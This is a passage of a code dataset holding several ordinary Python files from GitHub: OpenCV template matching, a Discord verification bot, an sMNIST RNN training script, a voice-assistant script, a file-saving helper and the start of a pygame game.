重叠阈值\n\t:return:\n\t\"\"\"\n\t# 获取模板图像的大小\n\tth, tw = template.shape[:2]\n\t# 初始化最大匹配度和对应的位置\n\tmatches = []\n\t# 保存保留的检测框索引\n\t# 在一定范围内进行旋转和比例不变变换,并计算相似度\n\tfor angle in range(0, 360, angle_step):\n\t\tfor scale in np.arange(scale_start, scale_stop, scale_step):\n\t\t\t# 进行旋转和比例不变变换\n\t\t\ttemplate_rotated = rotate_and_scale(template, angle, scale)\n\t\t\t# 计算相似度\n\t\t\tresult = cv2.matchTemplate(image, template_rotated, cv2.TM_CCOEFF_NORMED)\n\t\t\t# 找到所有符合阈值的匹配位置\n\t\t\tlocs = np.where(result <= similarity_threshold * result.min())\n\t\t\t# 将匹配结果保存到matches列表中\n\t\t\tfor pt in zip(*locs):\n\t\t\t\tmatches.append([pt, result[pt[0], pt[1]], angle, scale])\n\t\n\t# 对matches按照相似度从大到小排序\n\tmatches = sorted(matches, key=lambda x: x[1], reverse=False)\n\t\n\t# 取出得分最高的检测框\n\tmax_loc = matches[0][0]\n\tcv2.rectangle(image, (max_loc[1], max_loc[0]), (max_loc[1] + tw, max_loc[0] + th), (0, 0, 255), 2)\n\t\n\t# 遍历matches列表,画出符合重叠度要求的检测框\n\tfor match in matches:\n\t\tpt = match[0]\n\t\toverlap = compute_overlap(max_loc[1], max_loc[0], tw, th, pt[1], pt[0], tw, th)\n\t\tif overlap <= overlap_threshold:\n\t\t\tcv2.rectangle(image, (pt[1], pt[0]), (pt[1] + tw, pt[0] + th), (0, 0, 255), 2)\n\t\n\treturn image\n\n\ndef template_match_sift(image, template, threshold=0.75, draw_result=True):\n\t\"\"\"\n\t:param image:\n\t:param template:\n\t:param threshold:\n\t:param draw_result:\n\t:return:\n\t\"\"\"\n\t\n\t# Convert images to grayscale\n\tgray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\tgray_template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)\n\t\n\t# Initialize SIFT detector and FLANN matcher\n\tsift = cv2.xfeatures2d.SIFT_create()\n\tmatcher = cv2.FlannBasedMatcher_create()\n\t\n\t# Extract key_points and descriptors from template and image\n\tkey_points_template, descriptors_template = sift.detectAndCompute(gray_template, None)\n\tkey_points_image, descriptors_image = sift.detectAndCompute(gray_image, None)\n\t\n\t# Match descriptors using FLANN matcher\n\tmatches = matcher.knnMatch(descriptors_template, descriptors_image, k=2)\n\t\n\t# Filter matches by Lowe's ratio test\n\tgood_matches = []\n\tfor m, n in matches:\n\t\tif m.distance < 0.4 * n.distance:\n\t\t\tgood_matches.append(m)\n\t\n\t# Compute homography matrix using RANSAC algorithm\n\tsrc_pts = np.float32([key_points_template[m.queryIdx].pt for m in good_matches]).reshape(-1, 1, 2)\n\tdst_pts = np.float32([key_points_image[m.trainIdx].pt for m in good_matches]).reshape(-1, 1, 2)\n\tM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n\t\n\t# Apply perspective transform to template\n\th, w = template.shape[:2]\n\ttemplate_warped = cv2.warpPerspective(template, M, (w, h))\n\t\n\t# Match warped template to image using normalized cross-correlation\n\tresult = cv2.matchTemplate(gray_image, cv2.cvtColor(template_warped, cv2.COLOR_BGR2GRAY), cv2.TM_CCOEFF_NORMED)\n\t\n\t# Find locations of matched regions above threshold\n\tlocations = np.where(result >= threshold)\n\tlocations = list(zip(*locations[::-1]))\n\t\n\t# Draw bounding boxes around matched regions\n\tif draw_result:\n\t\tfor pt in locations:\n\t\t\tcv2.rectangle(image, pt, (pt[0] + w, pt[1] + h), (0, 0, 255), 2)\n\t\n\treturn image, locations\n\n\n# 读取目标图像和模板图像\ntarget_img = cv2.imread(r\"D:\\fy.xie\\fenx\\fenx - General\\Ubei\\Test_Label1\\Defect_008.png\")\ntemplate_img = cv2.imread(r\"D:\\fy.xie\\fenx\\fenx - General\\Ubei\\Test_Label1\\template.png\")\ntarget_img = clahe_equalize(target_img)\nimg = template_match_multi(target_img, template_img, 180, 0.5, 1.0, 0.2, 1.0, 0.1)\n# img,_ = template_match_sift(target_img, template_img)\ncv2.namedWindow(\"Barcode Detection\", cv2.WINDOW_NORMAL)\n\ncv2.imshow(\"Barcode Detection\", img)\nif cv2.waitKey(0) == 27:\n\tcv2.destroyAllWindows()\n","repo_name":"VanceXie/codeScan","sub_path":"location/Ineffective/templeMatch_Ineffective.py","file_name":"templeMatch_Ineffective.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43731891207","text":"import discord\nimport os\nimport random\nimport asyncio\nfrom discord.ext.commands import Bot\nimport keep_alive\nfrom discord.utils import get\n\ntoken = os.environ.get('BOT_TOKEN')\nbot = discord.Client()\n\n@bot.event\nasync def on_message(message):\n if(message.content == \"!verify\"):\n guild = message.guild\n embed = discord.Embed(title=\"Verification\", description=\"A new channel has been created for your verification. Welcome!\", color=0xFF5733)\n await message.channel.send(embed=embed)\n rand = random.randint(1000, 9999)\n global channelname\n channelname = \"user-\" + str(rand)\n global verify_role\n verify_role = await guild.create_role(name = channelname)\n global verified\n verified = get(guild.roles, name=\"Verified\")\n overwrites = {\n guild.default_role: discord.PermissionOverwrite(read_messages = False),\n verified: discord.PermissionOverwrite(read_messages = False),\n verify_role: discord.PermissionOverwrite(read_messages = True)\n }\n channel = await guild.create_text_channel(channelname, overwrites=overwrites)\n global channelid\n channelid = channel.id\n embed = discord.Embed(title=\"Verification\", description=\"Please enter your Minecraft username to verify yourself.\", color=0xFF5733)\n await channel.send(embed=embed)\n await message.author.add_roles(verify_role)\n if message.author.id != 894761300880662528 and \"user\" in message.channel.name:\n guild = message.author.guild\n await message.author.add_roles(get(guild.roles, name=\"Verified\"))\n channel = bot.get_channel(message.channel.id)\n verify_role = get(guild.roles, name=message.channel.name)\n await channel.delete()\n await verify_role.delete()\n name_role = await guild.create_role(name = message.content)\n await message.author.add_roles(name_role)\n\nbot.run(token)\n","repo_name":"IPMElite/VerificationBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74648463254","text":"from collections import deque\n\ndef solution(participant, completion):\n participant = deque(sorted(participant))\n completion = deque(sorted(completion))\n \n while participant:\n now = participant.popleft()\n if completion and now == completion.popleft():\n continue\n else:\n return now","repo_name":"unhhyyeexx/ProblemSolving","sub_path":"프로그래머스/lv1/42576. 완주하지 못한 선수/완주하지 못한 선수.py","file_name":"완주하지 못한 선수.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32802951141","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision as T\nimport numpy as np\nimport pickle\nimport argparse\nimport time\nimport os\nimport datetime\n\nworking_dir = os.path.dirname(os.path.realpath(__file__))\n\nfrom NetworkCreation.common import henaff_init, cayley_init, random_orthogonal_init\nfrom NetworkCreation.Networks import ARUN, RNN, LSTM, GRU\nfrom Training.training_utils import LocalTransform, SinTransform, StepTransform\nfrom torch._utils import _accumulate\nfrom torch.utils.data import Subset\n\nparser = argparse.ArgumentParser(description='(p)sMNIST task')\nparser.add_argument('-g', '--cuda', action='store_true', default=False,\n help='Use CUDA')\nparser.add_argument('-p', '--permute', action='store_true', default=False, \n help='permute the order of sMNIST')\nparser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Print details')\n\nparser.add_argument('--gain', type=float, default=1.0, \n help='degree of nonlinearity at initialization')\nparser.add_argument('--saturation', type=float, default=1.0, \n help='degree of saturation at initialization')\nparser.add_argument('--random', action='store_true', default=True, \n help='random shape parameters initialization')\nparser.add_argument('--learn_params', action='store_true', default=True,\n help='learn the shape parameters')\nparser.add_argument('--nonlin', type=str, default='gamma2', \n choices=['gamma','gamma2','ReLU'],\n help='Nonlinearity for RNN.')\nparser.add_argument('--net-type', type=str, default='RNN',\n choices=['ANRU', 'RNN', 'LSTM', 'GRU'],\n help='Type of recurrent neural net.')\nparser.add_argument('--nhid', type=int, default=400, \n help='hidden size of recurrent net')\nparser.add_argument('--lr', type=float, default=1e-4,\n help='initial learning rate')\n\nparser.add_argument('--save-freq', type=int, default=25, \n help='frequency (in epochs) to save data')\nparser.add_argument('--seed', type=int, default=400, \n help='random seed for reproducibility')\nparser.add_argument('--rinit', type=str, default=\"henaff\", \n help='recurrent weight matrix initialization')\nparser.add_argument('--iinit', type=str, default=\"kaiming\", \n help='input weight matrix initialization')\nparser.add_argument('--batch', type=int, default=100,\n help='batch size')\nparser.add_argument('--note', type=str, default='',\n help='Any details to be entered manually upon launch')\nparser.add_argument('--test', action='store_true', default=False,\n help='Test model, no training.')\n\nparser.add_argument('--transform', type=str, default='sin',\n help='Transform to be applied on test set')\nparser.add_argument('--transform-ratio', type=float, default=0.0,\n help='Ratio of dataset to apply sin transform on inputs.')\nargs = parser.parse_args()\n\nCUDA = args.cuda\nSAVEFREQ = args.save_freq\nn, s = args.gain, args.saturation\n\n# Set the random seed manually for reproducibility.\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\ntorch.cuda.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not CUDA:\n print(\"WARNING: You have a CUDA device, so you should probably run with -g,--cuda. Enabling CUDA.\")\n CUDA = True\ndevice = torch.device(\"cuda\" if CUDA else \"cpu\")\n\n\n###############################################################################\n# Load MNIST data\n###############################################################################\n\nif __name__ == \"__main__\":\n rng = np.random.RandomState(args.seed)\n if args.permute:\n task = 'psMNIST'\n order = rng.permutation(784)\n else:\n task = 'sMNIST'\n order = np.arange(784)\n\n trainset = T.datasets.MNIST(root=working_dir+'/Training/training_data/mnist', train=True, download=True, transform=T.transforms.ToTensor())\n valset = T.datasets.MNIST(root=working_dir+'/Training/training_data/mnist', train=True, download=True, transform=T.transforms.ToTensor())\n offset = 10000\n\n R = rng.permutation(len(trainset))\n lengths = (len(trainset) - offset, offset)\n trainset, valset = [Subset(trainset, R[offset - length:offset]) for offset, length in\n zip(_accumulate(lengths), lengths)]\n testset = T.datasets.MNIST(root=working_dir+'/Training/training_data/mnist', train=False, download=True, transform=T.transforms.ToTensor())\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch, shuffle=False, num_workers=2)\n valloader = torch.utils.data.DataLoader(valset, batch_size=args.batch, shuffle=False, num_workers=2)\n testloader = torch.utils.data.DataLoader(testset, batch_size=args.batch, num_workers=2)\n\n\n###############################################################################\n# Saving\n###############################################################################\n\nif __name__ == \"__main__\":\n if args.nonlin is not ('gamma' or 'gamma2'): \n args.learn_params = False\n\n if args.net_type=='RNN':\n udir = f'{args.net_type}_lr{args.lr}_p{args.transform_ratio}_hs{args.nhid}_{args.nonlin}'\n else:\n udir = f'{args.net_type}_lr{args.lr}_p{args.transform_ratio}_hs{args.nhid}'\n exp_time = \"{0:%Y-%m-%d}_{0:%H-%M-%S}\".format(datetime.datetime.now())\n SAVEDIR = os.path.join('./Training/SavedModels',\n task,\n str(args.seed),\n udir,\n str(datetime.date.today()))\n # Savedir is of type: ./Training/SavedModels/psMNIST/400/ARUN_lr0.0001_p0.0_hs400/2020-01-02/\n\n if not args.test:\n # Considering args.verbose runs as just debugging, so allowing overwritting. \n if args.verbose: SAVEDIR+='--X'\n # Else\n if not os.path.exists(SAVEDIR):\n os.makedirs(SAVEDIR)\n elif not args.verbose:\n SAVEDIR += '--0'\n try:\n os.makedirs(SAVEDIR)\n except FileExistsError:\n SAVEDIR = SAVEDIR[:-1]+str(int(SAVEDIR[-1])+1)\n os.makedirs(SAVEDIR)\n\n LOGFILE = os.path.join(SAVEDIR, 'logfile.txt')\n LOGTEST = os.path.join(SAVEDIR, 'test_results.txt')\n with open(LOGFILE, 'w') as fp:\n '''Details and hyperparameters, if desired'''\n fp.write(f'{task} task on {datetime.datetime.now()}\\n')\n fp.write(f'\\nSaving to: {SAVEDIR}')\n if args.note!='':\n fp.write(f'\\nNote : {args.note}')\n \n fp.write('\\n\\nHyperparameters: ')\n for key, val in args.__dict__.items():\n fp.write(('{}: {}, '.format(key, val)))\n\n with open(LOGTEST, 'w') as fp:\n fp.write('Testing data.')\n fp.write('\\n\\nTest => accuracy on original testing set\\nTest T. => accuracy on testing set with SinTransform(freq=1, phase=0, amplitude=0.5)')\n fp.write('\\n\\n'+'='*50+'\\n Epoch Test Test T. \\n'+'='*50)\n\n\n###############################################################################\n# Define the model\n###############################################################################\n\n\nclass Model(nn.Module):\n def __init__(self, hidden_size, rnn):\n super(Model, self).__init__()\n self.hidden_size = hidden_size\n\n # Modules\n self.lin = nn.Linear(hidden_size, 10)\n self.rnn = rnn\n\n self.loss_func = nn.CrossEntropyLoss()\n\n def forward(self, inputs, y, order, \n transform=None, return_ns=False, external_drive=None):\n h_net0, h_net1, a = None, None, None\n hiddens, shape_signals, pre_activations = [], [], []\n\n inputs = inputs[:, order] # permute inputs\n\n for i, input in enumerate(torch.unbind(inputs, dim=1)):\n x = input.unsqueeze(1)\n if transform is not None:\n x = transform(i, x)\n\n if external_drive is None:\n shift = 0.0\n else:\n shift = external_drive.get_factor(i)-1\n \n h_net0 = self.rnn(x, h_net0, external_drive=shift)\n\n for temp in [h_net0, h_net1]:\n if temp is not None and temp.requires_grad: \n temp.retain_grad()\n\n # if return_ns:\n # if args.net_type=='ARUN': \n # shape_signals.append(shape_parameters)\n # pre_activations.append(pre_activs.cpu().detach().numpy())\n # hiddens.append(h_net0.cpu().detach().numpy())\n\n out = self.lin(h_net0) # decode\n loss = self.loss_func(out, y)\n preds = torch.argmax(out, dim=1)\n correct = torch.eq(preds, y).sum().item()\n return loss, correct, hiddens\n\n # if transform is not None: suffix = '_T'\n # elif external_drive is not None: suffix='_D'\n # else: suffix+''\n \n # shape_signals_label = 'shapesignals'+suffix+'.npy'\n # hiddens_label = 'net0_hiddenstates'+suffix+'.npy'\n # preactivs_label = 'net0_preactivations'+suffix+'.npy'\n\n # if return_ns: \n # if args.net_type=='ARUN': \n # np.save(os.path.join(MODELDIR, shape_signals_label), shape_signals)\n # np.save(os.path.join(MODELDIR, preactivs_label), pre_activations)\n # np.save(os.path.join(MODELDIR, hiddens_label), hiddens)\n\n\ndef test_model(net, dataloader, transform=None, return_parameters=False, external_drive=None):\n accuracy = 0\n loss = 0\n net.eval()\n with torch.no_grad():\n for i, data in enumerate(dataloader):\n\n x, y = data\n x = x.view(-1, 784)\n if CUDA:\n x = x.cuda()\n y = y.cuda()\n if args.net_type == 'LSTM' or args.net_type == 'ARUN':\n net.rnn.init_states(x.shape[0])\n loss, c, _ = net.forward(x, y, order, transform=transform, return_ns=False, external_drive=external_drive)\n if args.verbose:\n if i%10==0: print(f'Step {i}, Loss: {loss.item()}')\n accuracy += c\n\n accuracy /= len(testset)\n return loss, accuracy\n\n\ndef save_checkpoint(state, fname):\n filename = os.path.join(SAVEDIR, fname)\n torch.save(state, filename)\n\ndef train_model(net, optimizer, scheduler, num_epochs):\n with open(LOGFILE, 'a') as fp:\n fp.write('\\n\\n'+'-'*70+'\\nBeginning of training.')\n fp.write('\\n\\nTrain => accuracy on training set \\nVal => accuracy on original validation set.\\nVal T. => accuracy on validation set with sinuisoidal transform')\n fp.write('\\n\\n'+'='*45+'\\n Epoch Time Train Val Val T. \\n'+'='*45)\n\n with open(os.path.join(SAVEDIR, 'training_loss_details.txt'), 'w') as fp:\n fp.write('Loss details:\\n')\n\n train_losses, train_accuracies = [], []\n val_losses, val_accuracies = [], []\n val_losses_T, val_accuracies_T = [], []\n save_norms = []\n shape_params = []\n\n best_val_acc = 0\n ta = 0\n for epoch in range(recover, recover+num_epochs):\n s_t = time.time()\n accs = []\n losses = []\n norms = []\n processed = 0\n net.train()\n correct = 0\n\n ts = np.random.binomial(1, args.transform_ratio, size=[500])\n for i, data in enumerate(trainloader, 0):\n inp_x, inp_y = data\n inp_x = inp_x.view(-1, 784)\n if bool(ts[i]):\n trans1 = SinTransform(freq=np.random.uniform(0,2), phase=0, amplitude=0.2)\n else:\n trans1 = None\n\n if CUDA:\n inp_x = inp_x.cuda()\n inp_y = inp_y.cuda()\n if args.net_type == 'LSTM' or args.net_type=='ARUN':\n net.rnn.init_states(inp_x.shape[0])\n\n optimizer.zero_grad()\n\n loss, c, _ = net.forward(inp_x, inp_y, order, transform=trans1)\n correct += c\n processed += inp_x.shape[0]\n\n accs.append(correct / float(processed))\n\n loss.backward()\n if args.verbose:\n if i%10==0: print(f'Step {i}, Loss: {loss.item()}')\n losses.append(loss.item())\n\n if np.isnan(loss.item()):\n raise ValueError\n\n optimizer.step()\n if i%50==0:\n with open(os.path.join(SAVEDIR, 'training_loss_details.txt'), 'a') as fp:\n fp.write('{:3.0f} Loss = {:5.8f}\\n'.format(i, loss.item()))\n\n norm = torch.nn.utils.clip_grad_norm_(net.parameters(), 'inf')\n norms.append(norm)\n\n # Validation\n val_loss, val_acc = test_model(net, valloader, transform=None)\n val_accuracies.append(val_acc)\n val_losses.append(val_loss)\n \n scheduler.step(val_loss) # lr scheduler based on validation loss\n\n # Validation on transformed set\n trans2 = SinTransform(freq=np.random.uniform(0,2), phase=0, amplitude=0.5)\n val_loss_T, val_acc_T = test_model(net, valloader, transform=trans2)\n val_accuracies_T.append(val_acc_T)\n val_losses_T.append(val_loss_T)\n\n with open(LOGFILE, 'a') as fp:\n fp.write('\\n {:3.0f} {} {:2.5f} {:2.5f} {:2.5f}'.\n format(epoch + 1, str(datetime.timedelta(seconds=int(time.time() - s_t))), \n np.mean(accs), val_acc, val_acc_T))\n\n train_losses.append(np.mean(losses))\n train_accuracies.append(np.mean(accs))\n save_norms.append(np.mean(norms))\n\n # Save data\n if epoch % 2 == 0 or epoch == num_epochs - 1:\n with open(os.path.join(SAVEDIR, 'Train_Losses'), 'wb') as fp:\n pickle.dump(train_losses, fp)\n with open(os.path.join(SAVEDIR, 'Val_Losses'), 'wb') as fp:\n pickle.dump(val_losses, fp)\n\n with open(os.path.join(SAVEDIR, 'Train_Accuracy'), 'wb') as fp:\n pickle.dump(train_accuracies, fp)\n with open(os.path.join(SAVEDIR, 'Val_Accuracy'), 'wb') as fp:\n pickle.dump(val_accuracies, fp)\n\n with open(os.path.join(SAVEDIR, 'Grad_Norms'), 'wb') as fp:\n pickle.dump(save_norms, fp)\n\n with open(os.path.join(SAVEDIR, 'val_Accuracy_T'), 'wb') as fp:\n pickle.dump(val_accuracies_T, fp)\n with open(os.path.join(SAVEDIR, 'val_Losses_T'), 'wb') as fp:\n pickle.dump(val_losses_T, fp)\n\n\n if epoch % SAVEFREQ == 0 or epoch == num_epochs - 1:\n save_checkpoint({\n 'state_dict': net.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch': epoch\n },\n 'e_{}.pth.tar'.format(epoch)\n )\n \n _, test_acc = test_model(net, testloader, transform=None)\n _, test_T_acc = test_model(net, testloader, transform=SinTransform(freq=1, phase=0, amplitude=0.5))\n with open(LOGTEST, 'a') as fp:\n fp.write('\\n {:3.0f} {:2.6f} {:2.6f}'.format(epoch, test_acc, test_T_acc))\n\n return\n\n\n###############################################################################\n# Training\n###############################################################################\n\ninp_size = 1\n\nif __name__ == \"__main__\":\n if args.net_type == 'ARUN':\n rnn = ARUN(inp_size, main_hidden_size=args.nhid, supervisor_hidden_size=50, cuda=CUDA,\n r_initializer=args.rinit, i_initializer=args.iinit, adaptation_type='heterogeneous', verbose=args.verbose)\n elif args.net_type == 'RNN':\n if args.random:\n n0 = 5+2*torch.rand(1); s0 = 0.0\n else:\n n0, s0 = args.gain, args.saturation\n rnn = RNN(inp_size, args.nhid, bias=True, nonlin=args.nonlin, cuda=CUDA, n_init=n0, s_init=s0,\n r_initializer=args.rinit, i_initializer=args.iinit, learn_params=args.learn_params)\n elif args.net_type == 'LSTM':\n rnn = LSTM(inp_size, args.nhid, cuda=CUDA)\n elif args.net_type == 'GRU':\n rnn = GRU(inp_size, args.nhid, cuda=CUDA)\n else:\n print('Net-type unrecognised. Using default: RNN')\n \n # set training modules\n net = Model(args.nhid, rnn)\n optimizer = optim.Adam(net.parameters(), lr=args.lr)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min') \n\n if args.verbose:\n print('\\nNumber of trainable parameters:')\n total_params = 0\n for name, parameter in net.named_parameters():\n if not parameter.requires_grad: continue\n param = parameter.numel()\n total_params+=param\n print(name, param)\n print('-> Total: {:6.0f} ({:3.1f}K)\\n'.format(total_params, total_params/1000))\n\n if CUDA:\n net = net.cuda()\n\n epoch = 0\n recover = 0\n #recover_date = '2021-02-12'\n epoch = recover\n num_epochs = 100 - recover \n\n if recover > 0: \n # Recover a pretrained model + continue training\n MODELDIR = os.path.join('./Training/SavedModels', task, str(args.seed), udir, recover_date)\n last_model = torch.load(os.path.join(MODELDIR, f'e_{recover}.pth.tar'))\n net.load_state_dict(last_model['state_dict'])\n print(f'Recovered: NET={args.net_type}, lr={args.lr}, p={args.transform_ratio}, epoch={recover}')\n\n if not args.test:\n try:\n train_model(net, optimizer, scheduler, num_epochs)\n except ValueError:\n with open(LOGFILE, 'a') as fp:\n fp.write(\"\\n\"+\"*\"*70+\"\\nNan loss encountered, program terminated.\")\n except KeyboardInterrupt:\n with open(LOGFILE, 'a') as fp:\n fp.write(\"\\n\"+\"*\"*70+\"\\nExited from training early\")\n else:\n '''\n Equivalent to: if args.test. Recover a pre-trained model.\n '''\n # set the following yourself\n recover = 50 \n recover_date = '2021-02-07--1'\n\n MODELDIR = os.path.join('./Training/SavedModels', task, str(args.seed), udir, recover_date)\n\n last_model = torch.load(os.path.join(MODELDIR, f'e_{recover}.pth.tar'))\n net.load_state_dict(last_model['state_dict'])\n print(f'Recovered: NET={args.net_type}, lr={args.lr}, p={args.transform_ratio}, epoch={recover}')\n\n start_time = time.time()\n test_loss, test_acc = test_model(net, testloader, transform=None, return_parameters=True)\n print('\\nOriginal:\\n\\tTest loss: {}\\n\\tTest accuracy: {}'.format(test_loss, test_acc))\n\n test_T_loss, test_T_acc = test_model(net, testloader, transform=SinTransform(freq=1, phase=0, amplitude=0.5), return_parameters=True)\n print('\\nTransformed:\\n\\tTest loss: {}\\n\\tTest accuracy: {}'.format(test_T_loss, test_T_acc))\n\n test_D_loss, test_D_acc = test_model(net, testloader, external_drive=StepTransform(step_size=1.0, step_length=200, step_position=200), return_parameters=True)\n print('\\nExternal drive:\\n\\tTest loss: {}\\n\\tTest accuracy: {}'.format(test_D_loss, test_D_acc)) \n print('\\nTime:', time.time() - start_time)\n","repo_name":"vgeadah/NonlinMod","sub_path":"sMNIST_task.py","file_name":"sMNIST_task.py","file_ext":"py","file_size_in_byte":19327,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"41693328515","text":"import speech_recognition as sr\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\nimport googlemaps\n\n# Initialize the recognizer\nrecognizer = sr.Recognizer()\n\n# Initialize the Google Maps API client (you'll need an API key)\ngmaps = googlemaps.Client(key='YOUR_API_KEY')\n\n# Function to capture voice input and convert it to text\ndef get_voice_input():\n with sr.Microphone() as source:\n print(\"Listening...\")\n try:\n audio = recognizer.listen(source, timeout=5)\n text = recognizer.recognize_google(audio)\n return text\n except sr.WaitTimeoutError:\n return \"Timeout: No speech detected.\"\n except sr.UnknownValueError:\n return \"Sorry, I could not understand what you said.\"\n except sr.RequestError as e:\n return f\"Error with the speech recognition service: {e}\"\n\n# Function to generate a text-based response\ndef get_response(user_input):\n user_input = user_input.lower()\n\n if \"hello\" in user_input:\n return \"Hello! How can I assist you?\"\n elif \"how are you\" in user_input:\n return \"I'm just a text-based assistant, but I'm here to help.\"\n elif \"bye\" in user_input:\n return \"Goodbye! Have a great day!\"\n elif \"time\" in user_input:\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n return f\"The current time is {current_time}.\"\n elif \"search\" in user_input:\n # Extract the search query from the user input\n query = user_input.replace(\"search\", \"\").strip()\n if query:\n search_results = perform_search(query)\n return search_results\n else:\n return \"Please provide a search query.\"\n elif \"guide to\" in user_input:\n place_name = user_input.replace(\"guide to\", \"\").strip()\n if place_name:\n guide = get_guide_to_place(place_name)\n return guide\n else:\n return \"Please specify a place for the guide.\"\n else:\n return \"I'm a simple text-based assistant. How can I assist you?\"\n\n# Function to perform a web search and return search results\ndef perform_search(query):\n search_url = f\"https://www.google.com/search?q={query}\"\n \n try:\n response = requests.get(search_url)\n response.raise_for_status()\n soup = BeautifulSoup(response.text, 'html.parser')\n search_results = soup.find_all(\"div\", class_=\"tF2Cxc\")\n if search_results:\n return search_results[0].get_text()\n else:\n return \"No search results found.\"\n except requests.exceptions.RequestException as e:\n return f\"Error performing the search: {e}\"\n\n# Function to get a guide to a place using Google Maps API\ndef get_guide_to_place(place_name):\n try:\n # Perform a geocode request to get the place details\n geocode_result = gmaps.geocode(place_name)\n\n if geocode_result:\n place_details = geocode_result[0]\n formatted_address = place_details.get(\"formatted_address\", \"Address not found.\")\n place_type = place_details.get(\"types\", [])\n place_type_str = \", \".join(place_type)\n \n return f\"Here's a guide to {place_name}:\\nType: {place_type_str}\\nAddress: {formatted_address}\"\n else:\n return \"Place not found.\"\n except googlemaps.exceptions.ApiError as e:\n return f\"Error getting place details: {e}\"\n\n# Main loop for voice interaction\nwhile True:\n user_input = get_voice_input()\n print(\"You said:\", user_input)\n\n response = get_response(user_input)\n print(\"Assistant:\", response)\n\n if \"exit\" in user_input.lower():\n break\n\n# End the program\nprint(\"Assistant: Goodbye!\")\n","repo_name":"RafikEmad/EmbeddedLinux","sub_path":"01_Python/04_Advanced/Task5_GoogleAssistant/GoogleAssistant.py","file_name":"GoogleAssistant.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8442679676","text":"import os, sys\nimport csv\nimport json\n# import geojson\n\n\n\n\n\ndef save_csv(data, fileName):\n \"\"\" data: list of dictionaries\n fileName: filePath//fileName.fileType\"\"\"\n with open(fn, 'w', newline='') as fw:\n csvwriter = csv.writer(fw)\n csvwriter.writerow(data[0].keys())\n for rw in save_data:\n csvwriter.writerow(rw.values())\n\ndef save_json(data, fileName):\n \"\"\" data: list of dictionaries (already a json object)\n fileName: filePath//fileName.fileType\"\"\"\n with open(fn, 'w') as fw:\n json.dump(data, fw, indent=4)\n\n\n# def save_geojson(data, fileName):\n# \"\"\" data: list of dictionaries\n# fileName: filePath//fileName.fileType\"\"\"\n\n# # if data is a list of dictionaries, we need to reformat\n# # into geojson data, using any columns in the file that look like Lat/Lon pairs\n\n# # if data is a dictionary, with first term: {'type': \"FeatureCollection\"}\n# # save directly to geojson, no restructuring necessary\n \n# with open(fn, 'w') as fw:\n# geojson.dump(data, fw, indent=4)\n\n\n","repo_name":"blcrosbie/ee_s5p_plugin","sub_path":"ee_s5p_plugin/scripts/file_handler.py","file_name":"file_handler.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24393475829","text":"import pygame\r\nfrom settings import *\r\nfrom tiles import Tile\r\nfrom level import Level\r\nfrom sys import exit\r\nfrom player import Player\r\nfrom game_data import level_0\r\nclock = pygame.time.Clock()\r\n#init\r\n#kill player==0 if player alive kill player==1 if player is dying\r\n\r\nclass Game():\r\n def __init__(self,joystick):\r\n# super().__init__()\r\n self.joystick=joystick\r\n #screen\r\n infoObject = pygame.display.Info()\r\n screen_width=infoObject.current_w\r\n screen_height=infoObject.current_h\r\n self.screen=pygame.display.set_mode((screen_height,screen_width),pygame.FULLSCREEN)\r\n self.clock=pygame.time.Clock()\r\n #level\r\n self.level=Level(level_0,self.screen)\r\n #backround\r\n pygame.display.set_caption('test game')\r\n self.sky_surface = pygame.image.load('graphics/sky.jpg').convert_alpha()\r\n #fonts\r\n self.def_font=pygame.font.Font(None,50)#default font\r\n\r\n self.running=True\r\n\r\n def run(self,death_count):\r\n quit_game = False\r\n game_over = False\r\n\r\n self.text_name = self.def_font.render(\"Deathcount \" + str(death_count), True, \"red\")\r\n while not quit_game and not game_over:\r\n\r\n for event in pygame.event.get(): #q\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n print(\"escape pressed\")\r\n quit_game = True\r\n pygame.quit()\r\n exit()\r\n if event.key == pygame.K_r:\r\n game_over = True\r\n if joystick: #check if joystick package instalized\r\n if pygame.joystick.get_count() > 0: # if theres a pad\r\n button_exit = self.joystick.get_button(7)\r\n if button_exit > 0:\r\n print(\"escape pressed on pad\")\r\n quit_game = True\r\n pygame.quit()\r\n exit()\r\n\r\n\r\n self.screen.blit(self.sky_surface,(0,0))\r\n self.level.run(self.joystick)\r\n self.screen.blit(self.text_name,(940,50))\r\n\r\n\r\n kill_player=self.level.death(0)\r\n #print(kill_player)\r\n if kill_player==1:\r\n\r\n self.level = Level(level_0, self.screen)\r\n self.run(death_count)\r\n pygame.display.update()\r\n #print(death_count)\r\n\r\n\r\n self.clock.tick(60)\r\n #print(self.clock.get_fps())\r\n return quit_game\r\n\r\nif __name__ == \"__main__\":\r\n pygame.init()\r\n # pad initalization\r\n joystick = None\r\n if joystick:\r\n print(\"joystick package is here\")\r\n if pygame.joystick.get_count() > 0:\r\n joystick = pygame.joystick.Joystick(0)\r\n joystick.init()\r\n print(\"joystick initialized\")\r\n else:\r\n joystick = False # look at get_input in player class\r\n print('joystick not initaliazed')\r\n 